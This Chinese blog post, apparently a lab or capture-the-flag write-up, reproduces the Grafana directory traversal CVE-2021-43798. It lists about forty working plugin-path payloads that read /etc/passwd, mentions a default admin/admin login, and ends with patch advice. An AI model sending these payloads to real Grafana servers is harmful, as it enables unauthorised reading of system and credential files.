grafana 目录遍历 (CVE-2021-43798)

前言

详细的漏洞分析见https://blog.csdn.net/weixin_45794666/article/details/123228409

漏洞描述

Grafana 是一个用于监控和可观察性的开源平台。Grafana 版本 8.0.0-beta1 到 8.3.0(补丁版本除外)容易受到目录遍历,允许访问本地文件。易受攻击的 URL 路径是:/public/plugins//,其中是任何已安装插件的插件 ID。Grafana Cloud 在任何时候都不会受到攻击。建议用户升级到补丁版本 8.0.7、8.1.8、8.2.7 或 8.3.1。GitHub 安全公告包含有关易受攻击的 URL 路径、缓解措施和披露时间表的更多信息。

复现过程

端口是3000
grafana 目录遍历 (CVE-2021-43798)_第1张图片

打开后是个登陆界面
grafana 目录遍历 (CVE-2021-43798)_第2张图片
试了下默认密码admin/admin,没想到进来了…
grafana 目录遍历 (CVE-2021-43798)_第3张图片
好了不玩了,以上不是本次漏洞的复现过程

首先是抓一个包
grafana 目录遍历 (CVE-2021-43798)_第4张图片
构造payload路径,因为漏洞是由插件造成的,不同插件的payload略有差别,下面是几乎所有插件的payload

/public/plugins/alertlist/../../../../../../../../../../../etc/passwd
/public/plugins/annolist/../../../../../../../../../../../etc/passwd
/public/plugins/grafana-azure-monitor-datasource/../../../../../../../../../../../etc/passwd
/public/plugins/barchart/../../../../../../../../../../../etc/passwd
/public/plugins/bargauge/../../../../../../../../../../../etc/passwd
/public/plugins/cloudwatch/../../../../../../../../../../../etc/passwd
/public/plugins/dashlist/../../../../../../../../../../../etc/passwd
/public/plugins/elasticsearch/../../../../../../../../../../../etc/passwd
/public/plugins/gauge/../../../../../../../../../../../etc/passwd
/public/plugins/geomap/../../../../../../../../../../../etc/passwd
/public/plugins/gettingstarted/../../../../../../../../../../../etc/passwd
/public/plugins/stackdriver/../../../../../../../../../../../etc/passwd
/public/plugins/graph/../../../../../../../../../../../etc/passwd
/public/plugins/graphite/../../../../../../../../../../../etc/passwd
/public/plugins/heatmap/../../../../../../../../../../../etc/passwd
/public/plugins/histogram/../../../../../../../../../../../etc/passwd
/public/plugins/influxdb/../../../../../../../../../../../etc/passwd
/public/plugins/jaeger/../../../../../../../../../../../etc/passwd
/public/plugins/logs/../../../../../../../../../../../etc/passwd
/public/plugins/loki/../../../../../../../../../../../etc/passwd
/public/plugins/mssql/../../../../../../../../../../../etc/passwd
/public/plugins/mysql/../../../../../../../../../../../etc/passwd
/public/plugins/news/../../../../../../../../../../../etc/passwd
/public/plugins/nodeGraph/../../../../../../../../../../../etc/passwd
/public/plugins/opentsdb/../../../../../../../../../../../etc/passwd
/public/plugins/piechart/../../../../../../../../../../../etc/passwd
/public/plugins/pluginlist/../../../../../../../../../../../etc/passwd
/public/plugins/postgres/../../../../../../../../../../../etc/passwd
/public/plugins/prometheus/../../../../../../../../../../../etc/passwd
/public/plugins/stat/../../../../../../../../../../../etc/passwd
/public/plugins/state-timeline/../../../../../../../../../../../etc/passwd
/public/plugins/status-history/../../../../../../../../../../../etc/passwd
/public/plugins/table/../../../../../../../../../../../etc/passwd
/public/plugins/table-old/../../../../../../../../../../../etc/passwd
/public/plugins/tempo/../../../../../../../../../../../etc/passwd
/public/plugins/testdata/../../../../../../../../../../../etc/passwd
/public/plugins/text/../../../../../../../../../../../etc/passwd
/public/plugins/timeseries/../../../../../../../../../../../etc/passwd
/public/plugins/welcome/../../../../../../../../../../../etc/passwd
/public/plugins/zipkin/../../../../../../../../../../../etc/passwd

拿第一个举例,把请求路径改为payload路径
grafana 目录遍历 (CVE-2021-43798)_第5张图片
可以读到passwd文件

flag在哪里呢?

在历史命令里面
grafana 目录遍历 (CVE-2021-43798)_第6张图片

修复建议

升级版本或者打补丁

你可能感兴趣的